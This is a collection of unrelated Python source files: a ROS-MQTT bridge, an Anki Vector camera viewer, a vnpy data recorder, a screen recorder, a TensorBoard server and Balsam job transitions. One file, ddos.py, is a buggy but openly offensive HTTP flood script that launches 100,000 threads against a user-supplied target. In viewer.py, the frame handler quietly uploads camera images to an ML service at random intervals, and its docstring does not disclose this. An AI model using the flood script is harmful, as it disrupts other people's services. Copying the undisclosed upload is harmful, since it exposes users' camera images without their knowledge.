self._serviceproxy = rospy.Service(self._local_server, self._srv_type, self._ros_handler)
def _ros_handler(self, req):
responses = {}
lock = Condition()
def __response_handler(client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
rospy.logdebug('got response for %s' % msg_dict['id'])
with lock:
responses[msg_dict['id']] = msg_dict['response']
lock.notifyAll()
rospy.logdebug('local service %s called.' % self._local_server)
# generate a unique ID
request_id = str(uuid4())
# build a request to send to the external client
request_message = {
"op": "call_service",
"id": request_id,
"response_topic": self._control_topic + '/service/response/' + request_id,
"type": self._srv_type_name,
"service": self._remote_server,
"args": extract_values(req)
}
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(request_message['response_topic'], qos=2)
self._mqtt_client.message_callback_add(request_message['response_topic'], __response_handler)
payload = bytearray(self._serialize(request_message))
self._mqtt_client.publish(
topic=self._mqtt_topic_request, payload=payload,
qos=2, retain=False)
# wait for a response
while not rospy.is_shutdown() and request_id not in responses.keys():
with lock:
lock.wait(1) # check for shutdown every 1 second
resp = responses[request_id]
del responses[request_id]
self._mqtt_client.unsubscribe(request_message['response_topic'])
# assemble response object
response_type = lookup_object(self._srv_type_name+"Response")
# create response object
r = response_type()
# and populate it
if resp is None:
rospy.logerr('Service Request could not be completed')
raise rospy.ROSException('Service Request could not be completed')
populate_instance(resp, r)
return r
__all__ = [
'create_bridge', 'Bridge', 'RosToMqttBridge', 'MqttToRosBridge',
'DynamicBridgeServer', 'SubscribeBridge', 'PublishBridge', 'RemoteService', 'LocalServiceProxy']
|
viewer.py
|
# Copyright (c) 2018 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Displays camera feed from Vector's camera.
"""
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['ViewerComponent', 'Viewer3DComponent']
import multiprocessing as mp
import sys
import threading
import time
import random
import uuid
from datetime import datetime, timedelta
try:
from PIL import Image
except ImportError:
sys.exit("Cannot import from PIL: Do `pip3 install --user Pillow` to install")
from . import util
from .events import Events
from .ml.agent import MLAgent
class ViewerComponent(util.Component):
"""This component opens a window and renders the images obtained from Vector's camera.
This viewer window is run in a separate process spawned by :func:`~ViewerComponent.show`.
Being on a separate process means the rendering of the camera does not block the main thread
of the calling code, and allows the viewer to have its own ui thread which it can operate on.
:func:`~ViewerComponent.close` will stop the viewer process.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(show_viewer=True) as robot:
time.sleep(5)
:param robot: A reference to the owner Robot object. (May be :class:`None`)
"""
def __init__(self, robot):
super().__init__(robot)
self.overlays: list = []
self._close_event: mp.Event = None
self._frame_queue: mp.Queue = None
self._process = None
self._mlAgent = MLAgent()
self._last_upload_timestamp = 0
self._next_upload_timestamp = 0
def show(self, timeout: float = 10.0, force_on_top: bool = True) -> None:
"""Render a video stream using the images obtained from
Vector's camera feed.
.. testcode::
import anki_vector
import time
with anki_vector.Robot() as robot:
robot.viewer.show()
time.sleep(10)
:param timeout: Render video for the given time. (Renders forever, if timeout not given.)
:param force_on_top: Specifies whether the window should be forced on top of all others.
"""
from . import camera_viewer
self.robot.camera.init_camera_feed()
ctx = mp.get_context('spawn')
self._close_event = ctx.Event()
self._frame_queue = ctx.Queue(maxsize=4)
self._process = ctx.Process(target=camera_viewer.main,
args=(self._frame_queue,
self._close_event,
self.overlays,
timeout,
force_on_top),
daemon=True,
name="Camera Viewer Process")
self._process.start()
def close(self) -> None:
"""Stop rendering video of Vector's camera feed and close the viewer process.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(show_viewer=True) as robot:
time.sleep(10)
robot.viewer.close()
"""
if self._close_event:
self._close_event.set()
self._close_event = None
if self._frame_queue:
try:
self._frame_queue.put(None, False)
except mp.queues.Full:
pass
self._frame_queue = None
if self._process:
self._process.join(timeout=5)
if self._process.is_alive():
self._process.terminate()
self._process = None
def _get_next_upload_time_delta(self):
"""
Generate the timedelta after which the next image should be uploaded.
Currently the timedelta is configured to be between 20 sec and 1 minute
"""
rand = random.randint(20, 60)
delta = timedelta(seconds=rand)
return delta
def enqueue_frame(self, image: Image.Image):
"""Sends a frame to the viewer's rendering process. Sending `None` to the viewer
will cause it to gracefully shutdown.
.. note::
This function will be called automatically from the camera feed when the
:class:`~anki_vector.robot.Robot` or :class:`~anki_vector.robot.AsyncRobot`
object is created with ``show_viewer=True``.
.. code-block:: python
import anki_vector
from PIL.Image import Image
image = Image()
with anki_vector.Robot(show_viewer=True) as robot:
robot.viewer.enqueue_frame(image)
:param image: A frame from Vector's camera.
"""
close_event = self._close_event
current_time = datetime.now()
if not self._last_upload_timestamp or current_time >= self._next_upload_timestamp:
if self._last_upload_timestamp:
imageName = uuid.uuid4()
self._mlAgent.upload_image(image, 'robot' + str(imageName))
self._last_upload_timestamp = current_time
self._next_upload_timestamp = \
current_time + self._get_next_upload_time_delta()
processed_image = self._mlAgent.run_inference(image)
if self._frame_queue is not None and close_event is not None and not close_event.is_set():
try:
self._frame_queue.put(processed_image, False)
except mp.queues.Full:
pass
def _apply_overlays(self, image: Image.Image) -> None:
"""Apply all overlays attached to viewer instance on to image from camera feed."""
for overlay in self.overlays:
overlay.apply_overlay(image)
return image
class _ExternalRenderCallFunctor(): # pylint: disable=too-few-public-methods
"""Externally specified OpenGL render function.
Allows extra geometry to be rendered into OpenGLViewer.
:param f: function to call inside the rendering loop
:param f_args: a list of arguments to supply to the callable function
"""
def __init__(self, f: callable, f_args: list):
self._f = f
self._f_args = f_args
def invoke(self, user_data_queue):
"""Calls the internal function"""
self._f(*self._f_args, user_data_queue=user_data_queue)
class Viewer3DComponent(util.Component):
"""This component opens a window and renders the a 3D view obtained from Vector's navigation map.
This viewer window is run in a separate process spawned by :func:`~Viewer3DComponent.show`.
Being on a separate process means the rendering of the 3D view does not block the main thread
of the calling code, and allows the viewer to have its own ui thread with which it can render OpenGL.
:func:`~Viewer3DComponent.close` will stop the viewer process.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(enable_nav_map_feed=True, show_3d_viewer=True) as robot:
time.sleep(5)
:param robot: A reference to the owner Robot object. (May be :class:`None`)
"""
def __init__(self, robot):
super().__init__(robot)
self.overlays: list = []
self._close_event: mp.Event = None
self._input_intent_queue: mp.Queue = None
self._nav_map_queue: mp.Queue = None
self._world_frame_queue: mp.Queue = None
self._extra_render_function_queue: mp.Queue = None
self._user_data_queue: mp.Queue = None
self._process: mp.process.BaseProcess = None
self._update_thread: threading.Thread = None
self._last_robot_control_intents = None
self.connecting_to_cube = False
def show(self, show_viewer_controls: bool = True):
"""Spawns a background process that shows the navigation map in a 3D view.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(enable_nav_map_feed=True) as robot:
robot.viewer_3d.show()
time.sleep(5)
robot.viewer_3d.close()
:param show_viewer_controls: Specifies whether to draw controls on the view.
"""
from . import opengl
ctx = mp.get_context('spawn')
self._close_event = ctx.Event()
self._input_intent_queue = ctx.Queue(maxsize=10)
self._nav_map_queue = ctx.Queue(maxsize=10)
self._world_frame_queue = ctx.Queue(maxsize=10)
self._extra_render_function_queue = ctx.Queue(maxsize=1)
self._user_data_queue = ctx.Queue()
self._update_thread = threading.Thread(target=self._update,
args=(),
daemon=True,
name="3D Viewer Update Thread")
self._update_thread.start()
self._process = ctx.Process(target=opengl.main,
args=(self._close_event,
self._input_intent_queue,
self._nav_map_queue,
self._world_frame_queue,
self._extra_render_function_queue,
self._user_data_queue,
show_viewer_controls),
daemon=True,
name="3D Viewer Process")
self._process.start()
self.robot.events.subscribe(self._on_robot_state_update, Events.robot_state)
self.robot.events.subscribe(self._on_nav_map_update, Events.nav_map_update)
@property
def user_data_queue(self):
"""A queue to send custom data to the 3D viewer process.
Best used in conjunction with :func:`~Viewer3DComponent.add_render_call` to place
a process on the 3D viewer process then obtain data from this queue.
"""
return self._user_data_queue
def add_render_call(self, render_function: callable, *args):
"""Allows external functions to be injected into the viewer process which
will be called at the appropriate time in the rendering pipeline.
Example usage to draw a dot at the world origin:
.. code-block:: python
import time
import anki_vector
def my_render_function(user_data_queue):
glBegin(GL_POINTS)
glVertex3f(0, 0, 0)
glEnd()
with anki_vector.Robot(enable_nav_map_feed=True, show_3d_viewer=True) as robot:
robot.viewer_3d.add_render_call(my_render_function)
time.sleep(10)
:param render_function: The delegated function to be invoked in the pipeline.
:param args: An optional list of arguments to send to the render_function
the arguments list must match the parameters accepted by the
supplied function.
"""
self._extra_render_function_queue.put(_ExternalRenderCallFunctor(render_function, args))
def close(self):
"""Closes the background process showing the 3D view.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(enable_nav_map_feed=True) as robot:
robot.viewer_3d.show()
time.sleep(5)
robot.viewer_3d.close()
"""
if self._close_event:
self._close_event.set()
self._close_event = None
if self._update_thread:
self._update_thread.join(timeout=2)
self._update_thread = None
self._input_intent_queue = None
self._nav_map_queue = None
self._world_frame_queue = None
if self._process:
self._process.join(timeout=5)
if self._process.is_alive():
self._process.terminate()
self._process = None
def connect_to_cube(self):
'''Connect to light cube'''
if self.connecting_to_cube:
return
self.connecting_to_cube = True
self.robot.world.connect_cube()
self.connecting_to_cube = False
return
def _update(self):
"""Reads most recently stored user-triggered intents, and sends
motor messages to the robot if the intents should effect the robot's
current motion.
Called on SDK thread, for controlling robot from input intents
pushed from the OpenGL thread.
:param robot: the robot being updated by this View Controller
"""
close_event = self._close_event
while close_event and not close_event.is_set():
try:
input_intents = self._input_intent_queue.get(True, timeout=2) # type: RobotControlIntents
# Track last-used intents so that we only issue motor controls
# if different from the last frame (to minimize it fighting with an SDK
# program controlling the robot):
old_intents = self._last_robot_control_intents
self._last_robot_control_intents = input_intents
if not old_intents or (old_intents.left_wheel_speed != input_intents.left_wheel_speed
or old_intents.right_wheel_speed != input_intents.right_wheel_speed):
self.robot.motors.set_wheel_motors(input_intents.left_wheel_speed,
input_intents.right_wheel_speed,
input_intents.left_wheel_speed * 4,
input_intents.right_wheel_speed * 4,
_return_future=True)
if not old_intents or old_intents.lift_speed != input_intents.lift_speed:
self.robot.motors.set_lift_motor(input_intents.lift_speed, _return_future=True)
if not old_intents or old_intents.head_speed != input_intents.head_speed:
self.robot.motors.set_head_motor(input_intents.head_speed, _return_future=True)
if input_intents.connect_to_light_block and (old_intents is None or not old_intents.connect_to_light_block):
threading.Thread(target=self.connect_to_cube).start()
except mp.queues.Empty:
pass
close_event = self._close_event
def _on_robot_state_update(self, robot, *_):
"""Called from SDK process whenever the robot state is updated (so i.e. every engine tick).
Note:
This is called from the SDK process, and will pass the nav map data to the
3D viewer process.
We can safely capture any robot and world state here, and push to OpenGL
(main) process via a multiprocessing queue.
"""
from .opengl import opengl_vector
world_frame = opengl_vector.WorldRenderFrame(robot, self.connecting_to_cube)
queue = self._world_frame_queue
if queue:
try:
queue.put(world_frame, False)
except mp.queues.Full:
pass
def _on_nav_map_update(self, _robot, _event_type, msg):
"""Called from SDK process whenever the nav map is updated.
Note:
This is called from the SDK process, and will pass the nav map data to the
3D viewer process.
We can safely capture any robot and world state here, and push to OpenGL
(main) process via a multiprocessing queue.
"""
queue = self._nav_map_queue
if queue:
try:
queue.put(msg, False)
except mp.queues.Full:
pass
|
runDataRecording.py
|
# encoding: UTF-8
from __future__ import print_function
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import ctpGateway
from vnpy.trader.app import dataRecorder
#----------------------------------------------------------------------
def processErrorEvent(event):
"""
处理错误事件
错误信息在每次登陆后,会将当日所有已产生的均推送一遍,所以不适合写入日志
"""
error = event.dict_['data']
print(u'错误代码:%s,错误信息:%s' %(error.errorID, error.errorMsg))
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-'*20)
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动行情记录运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(ctpGateway)
me.addApp(dataRecorder)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_ERROR, processErrorEvent)
le.info(u'注册日志事件监听')
me.connect('CTP')
le.info(u'连接CTP接口')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动行情记录守护父进程')
DAY_START = time(8, 57) # 日盘启动和停止时间
DAY_END = time(15, 18)
NIGHT_START = time(20, 57) # 夜盘启动和停止时间
NIGHT_END = time(2, 33)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = False
# 判断当前处于的时间段
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# 过滤周末时间段:周六全天,周五夜盘,周日日盘
if ((datetime.today().weekday() == 6) or
(datetime.today().weekday() == 5 and currentTime > NIGHT_END) or
(datetime.today().weekday() == 0 and currentTime < DAY_START)):
recording = False
# 记录时间则需要启动子进程
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# 非记录时间则退出子进程
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
#runChildProcess()
runParentProcess()
|
ddos.py
|
import threading
import socket
target = input("kimi sikmek istersin muwah: ")
port = 80;
fake_ip = '99.30.40.31'
already = 0;
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "r\n\r\n").encode('ascii'), (target, port))
already+1
print(already + "packets sending")
s.close
for i in range(100000):
thread = threading.Thread(target=attack)
thread.start()
|
1.2.2.4-screen_recording.py
|
from PIL import ImageGrab
import numpy as np
from cv2 import cv2
import datetime
from pynput import keyboard
import threading
flag = False
def video_record():
print("start recording at %s!" % datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
p = ImageGrab.grab() # 获得当前屏幕
a, b = p.size # 获得当前屏幕的大小
fourcc = cv2.VideoWriter_fourcc(*'XVID')
# 帧率为12
video = cv2.VideoWriter('%s.avi' % datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S'), fourcc, 12, (a, b))
while True:
img = ImageGrab.grab()
img_cvt = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)
video.write(img_cvt)
if flag:
print("stop recording!")
break
video.release()
def on_press(key):
"""
:param key:
:return:
"""
global flag
if key == keyboard.Key.esc:
flag = True
print("stop monitor!")
return False # 返回False,键盘监听结束.
if __name__ == '__main__':
th = threading.Thread(target=video_record)
th.start()
with keyboard.Listener(on_press=on_press) as listener:
listener.join()
# 问题:获取频率可能取决于处理器速度,在我的笔记本上FPS约为10,比较低;由于以上原因写入文件回放会出现快放/慢放问题;码率太高。
|
server.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import gcs
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type
TENSORBOARD_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 4,
event_accumulator.AUDIO: 4,
event_accumulator.SCALARS: 1000,
event_accumulator.HISTOGRAMS: 50,
}
def ParseEventFilesSpec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
for specification in logdir.split(','):
# If it's a gcs or hdfs path, don't split on colon
if gcs.IsGCSPath(specification) or specification.startswith('hdfs://'):
run_name = None
path = specification
# If the spec looks like /foo:bar/baz, then we assume it's a path with a
# colon.
elif ':' in specification and specification[0] != '/':
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if not gcs.IsGCSPath(path):
path = os.path.realpath(path)
files[path] = run_name
return files
def ReloadMultiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
multiplexer.Reload()
duration = time.time() - start
logging.info('Multiplexer done loading. Load took %0.1f secs', duration)
def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
for path in path_to_run.keys():
if gcs.IsGCSPath(path):
gcs.CheckIsSupported()
logging.info(
'Assuming %s is intended to be a Google Cloud Storage path because '
'it starts with %s. If it isn\'t, prefix it with \'/.\' (i.e., use '
'/.%s instead)', path, gcs.PATH_PREFIX, path)
def _ReloadForever():
while True:
ReloadMultiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_ReloadForever)
thread.daemon = True
thread.start()
return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
"""A threaded HTTP server."""
daemon_threads = True
def BuildServer(multiplexer, host, port, logdir):
"""Sets up an HTTP server for running TensorBoard.
Args:
multiplexer: An `EventMultiplexer` that the server will query for
information about events.
host: The host name.
port: The port number to bind to, or 0 to pick one automatically.
logdir: The logdir argument string that tensorboard started up with.
Returns:
A `BaseHTTPServer.HTTPServer`.
"""
factory = functools.partial(handler.TensorboardHandler, multiplexer, logdir)
return ThreadedHTTPServer((host, port), factory)
|
transitions.py
|
'''BalsamJob Transitions
The user selects ``NUM_TRANSITION_THREADS`` processes to run
alongside the main Launcher process. These are created with ``multiprocessing.Process``
and communicate with the Launcher through a ``multiprocessing.Queue`` (or a
PriorityQueue via a ``multiprocessing.managers.SyncManager``)
The transition processes pull jobs from the queue, execute the necessary
transition function, and signal completion by putting a status message back on a
status queue. These transition processes explicitly ignore SIGINT and SIGTERM
interrupts, so that they can finish the current transition and exit gracefully,
under control of the main Launcher process.
'''
from collections import defaultdict
import glob
import multiprocessing
import os
from io import StringIO
from traceback import print_exc
import random
import signal
import shutil
import subprocess
import time
import tempfile
from django import db
from django.db.models.functions import Cast, Substr
from django.db.models import CharField
from balsam.core import transfer
from balsam.core.models import BalsamJob, PROCESSABLE_STATES
from balsam.launcher.util import get_tail
import logging
logger = logging.getLogger(__name__)
JOBCACHE_LIMIT = 1000
PREPROCESS_TIMEOUT_SECONDS = 300
POSTPROCESS_TIMEOUT_SECONDS = 300
EXIT_FLAG = False
class BalsamTransitionError(Exception): pass
def handler(signum, stack):
global EXIT_FLAG
EXIT_FLAG = True
class TransitionProcessPool:
'''Launch and terminate the transition processes'''
def __init__(self, num_threads, wf_name):
self.procs = [multiprocessing.Process(
target=main, args=(i, num_threads, wf_name),
name=self.__class__.__name__+str(i))
for i in range(num_threads)]
logger.info(f"Starting {len(self.procs)} transition processes")
db.connections.close_all()
for proc in self.procs:
proc.daemon = True
proc.start()
def terminate(self):
'''Terminate workers via signal and process join'''
logger.debug("Sending sigterm and waiting on transition processes")
for proc in self.procs:
proc.terminate()
for proc in self.procs:
proc.join()
logger.info("All Transition processes joined: done.")
@db.transaction.atomic
def fail_update(failed_jobs):
for job in failed_jobs:
try:
failmsg = job.__fail_msg
except AttributeError:
failmsg = ''
job.refresh_from_db()
job.update_state('FAILED', failmsg)
def update_states_from_cache(job_cache):
# Update states of fast-forwarded jobs
update_jobs = defaultdict(list)
failed_jobs = []
for job in job_cache:
if job.state != job.__old_state:
job.__old_state = job.state
if job.state != 'FAILED':
update_jobs[job.state].append(job.pk)
else:
failed_jobs.append(job)
if failed_jobs:
fail_update(failed_jobs)
for newstate, joblist in update_jobs.items():
BalsamJob.batch_update_state(joblist, newstate)
def select_range(num_threads, thread_idx):
HEX_DIGITS = '0123456789abcdef'
chunk, rem = divmod(len(HEX_DIGITS), num_threads)
start, end = thread_idx*chunk, (thread_idx+1)*chunk
my_digits = HEX_DIGITS[start:end]
if thread_idx < rem:
my_digits += HEX_DIGITS[thread_idx-rem]
manager = BalsamJob.source
processable = manager.by_states(PROCESSABLE_STATES).filter(lock='')
processable = processable.order_by('-state') # put AWAITING_PARENTS last to avoid starvation
logger.debug(f"There are {processable.count()} processable jobs")
if num_threads == 1:
qs = processable
else:
qs = processable.annotate(first_pk_char=Substr(Cast('pk', CharField(max_length=36)) , 1, 1))
qs = qs.filter(first_pk_char__in=my_digits)
qs = qs.values_list('pk', flat=True)[:JOBCACHE_LIMIT]
logger.debug(f"TransitionThread{thread_idx} select:\n{qs.query}")
return list(qs)
def refresh_cache(job_cache, num_threads, thread_idx):
manager = BalsamJob.source
to_acquire = select_range(num_threads, thread_idx)
logger.debug(f"TransitionThread{thread_idx} will try to acquire: {[str(id)[:8] for id in to_acquire]}")
acquired = manager.acquire(to_acquire)
if len(acquired) < len(to_acquire):
st = random.random()
time.sleep(st)
logger.debug(f"failed to acquire {len(to_acquire)}; only got {len(acquired)}")
if acquired:
logger.debug(f'Acquired {len(acquired)} new jobs')
acquired = BalsamJob.objects.filter(pk__in=acquired)
job_cache.extend(acquired)
for job in job_cache:
job.__old_state = job.state
def release_jobs(job_cache):
manager = BalsamJob.source
release_jobs = [
j.pk for j in job_cache if
(j.state not in PROCESSABLE_STATES)
or (j.state == 'AWAITING_PARENTS')
]
if release_jobs:
manager.release(release_jobs)
return [j for j in job_cache if j.pk not in release_jobs]
def main(thread_idx, num_threads, wf_name):
global EXIT_FLAG
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
manager = BalsamJob.source
manager.workflow = wf_name
random.seed(multiprocessing.current_process().pid)
time.sleep(random.random())
manager.start_tick()
try:
_main(thread_idx, num_threads)
except:
buf = StringIO()
print_exc(file=buf)
logger.critical(f"Uncaught exception:\n%s", buf.getvalue())
finally:
manager.release_all_owned()
logger.debug('Transition process finished: released all jobs')
def _main(thread_idx, num_threads):
global EXIT_FLAG
manager = BalsamJob.source
job_cache = []
last_refresh = 0
refresh_period = 5
while not EXIT_FLAG:
# Update in-memory cache of locked BalsamJobs
elapsed = time.time() - last_refresh
if elapsed > refresh_period:
if len(job_cache) < JOBCACHE_LIMIT:
refresh_cache(job_cache, num_threads, thread_idx)
last_refresh = time.time()
else:
time.sleep(1)
# Fast-forward transitions & release locks
fast_forward(job_cache)
job_cache = release_jobs(job_cache)
# Run transitions (one pass over all jobs)
for job in job_cache:
transition_function = TRANSITIONS[job.state]
try:
transition_function(job)
except BalsamTransitionError as e:
job.state = 'FAILED'
buf = StringIO()
print_exc(file=buf)
job.__fail_msg = buf.getvalue()
logger.exception(f"Marking {job.cute_id} as FAILED")
if EXIT_FLAG:
break
# Update states in bulk
update_states_from_cache(job_cache)
job_cache = release_jobs(job_cache)
logger.info('EXIT_FLAG: exiting main loop')
def check_parents(job):
'''Check job's dependencies, update to READY if satisfied'''
num_parents = len(job.get_parents_by_id())
if num_parents == 0 or not job.wait_for_parents:
ready = True
else:
parents = job.get_parents()
ready = num_parents == parents.filter(state='JOB_FINISHED').count()
if ready:
job.state = 'READY'
logger.debug(f'{job.cute_id} ready')
elif job.state != 'AWAITING_PARENTS':
job.state = 'AWAITING_PARENTS'
logger.info(f'{job.cute_id} waiting for {num_parents} parents')
elif parents.filter(state__in=['FAILED', 'USER_KILLED']).exists():
job.state = 'FAILED'
job.__fail_msg = 'One or more parent jobs failed'
def fast_forward(job_cache):
'''Make several passes over the job list; advancing states in order'''
# Check parents
check_jobs = (j for j in job_cache if j.state in 'CREATED AWAITING_PARENTS'.split())
for job in check_jobs: check_parents(job)
# Skip stage-in
stagein_jobs = (j for j in job_cache if j.state == 'READY')
for job in stagein_jobs:
workdir = job.working_directory
if not os.path.exists(workdir):
os.makedirs(workdir)
logger.info(f"{job.cute_id} created working directory {workdir}")
hasParents = bool(job.get_parents_by_id())
hasInput = bool(job.input_files)
hasRemote = bool(job.stage_in_url)
if not hasRemote and not (hasParents and hasInput): job.state = 'STAGED_IN'
# Skip preprocess
preprocess_jobs = (j for j in job_cache if j.state == 'STAGED_IN')
for job in preprocess_jobs:
if not job.preprocess:
job.state = 'PREPROCESSED'
# RUN_DONE: skip postprocess
done_jobs = (j for j in job_cache if j.state=='RUN_DONE' and not j.postprocess)
for job in done_jobs:
job.state = 'POSTPROCESSED'
# Timeout: retry
retry_jobs = (j for j in job_cache if j.state=='RUN_TIMEOUT'
and j.auto_timeout_retry and not j.post_timeout_handler)
for job in retry_jobs:
job.state = 'RESTART_READY'
# Timeout: fail
timefail_jobs = (j for j in job_cache if j.state=='RUN_TIMEOUT'
and not j.auto_timeout_retry
and not (j.postprocess and j.post_timeout_handler)
)
for job in timefail_jobs:
job.state = 'FAILED'
# Error: fail
errfail_jobs = (j for j in job_cache if j.state=='RUN_ERROR'
and not (j.post_error_handler and j.postprocess)
)
for job in errfail_jobs:
job.state = 'FAILED'
# skip stageout (finished)
stageout_jobs = (j for j in job_cache if j.state=='POSTPROCESSED'
and not (j.stage_out_url and j.stage_out_files)
)
for job in stageout_jobs:
job.state = 'JOB_FINISHED'
update_states_from_cache(job_cache)
def stage_in(job):
logger.debug(f'{job.cute_id} in stage_in')
work_dir = job.working_directory
if not os.path.exists(work_dir):
os.makedirs(work_dir)
logger.debug(f"{job.cute_id} working directory {work_dir}")
# stage in all remote urls
# TODO: stage_in remote transfer should allow a list of files and folders,
# rather than copying just one entire folder
url_in = job.stage_in_url
if url_in:
logger.info(f"{job.cute_id} transfer in from {url_in}")
try:
transfer.stage_in(f"{url_in}", f"{work_dir}")
except Exception as e:
message = 'Exception received during stage_in: ' + str(e)
raise BalsamTransitionError(message) from e
# create unique symlinks to "input_files" patterns from parents
# TODO: handle data flow from remote sites transparently
matches = []
parents = job.get_parents()
input_patterns = job.input_files.split()
logger.debug(f"{job.cute_id} searching parent workdirs for {input_patterns}")
for parent in parents:
parent_dir = parent.working_directory
for pattern in input_patterns:
path = os.path.join(parent_dir, pattern)
matches.extend((parent.pk, match)
for match in glob.glob(path))
for parent_pk, inp_file in matches:
basename = os.path.basename(inp_file)
new_path = os.path.join(work_dir, basename)
if os.path.exists(new_path):
new_path += f"_{str(parent_pk)[:8]}"
# pointing to src, named dst
logger.info(f"{job.cute_id} {new_path} --> {inp_file}")
try:
os.symlink(src=inp_file, dst=new_path)
except FileExistsError:
logger.warning(f"Symlink at {new_path} already exists; skipping creation")
except Exception as e:
raise BalsamTransitionError(
f"Exception received during symlink: {e}") from e
job.state = 'STAGED_IN'
logger.debug(f"{job.cute_id} stage_in done")
def stage_out(job):
'''copy from the local working_directory to the output_url '''
logger.debug(f'{job.cute_id} in stage_out')
url_out = job.stage_out_url
if not url_out:
job.state = 'JOB_FINISHED'
logger.debug(f'{job.cute_id} no stage_out_url: done')
return
stage_out_patterns = job.stage_out_files.split()
logger.debug(f"{job.cute_id} stage out files match: {stage_out_patterns}")
work_dir = job.working_directory
matches = []
for pattern in stage_out_patterns:
path = os.path.join(work_dir, pattern)
matches.extend(glob.glob(path))
if matches:
logger.info(f"{job.cute_id} stage out files: {matches}")
with tempfile.TemporaryDirectory() as stagingdir:
try:
for f in matches:
base = os.path.basename(f)
dst = os.path.join(stagingdir, base)
shutil.copyfile(src=f, dst=dst)
logger.info(f"staging {f} out for transfer")
logger.info(f"transferring to {url_out}")
transfer.stage_out(f"{stagingdir}/*", f"{url_out}/")
except Exception as e:
message = f'Exception received during stage_out: {e}'
raise BalsamTransitionError(message) from e
job.state = 'JOB_FINISHED'
logger.debug(f'{job.cute_id} stage_out done')
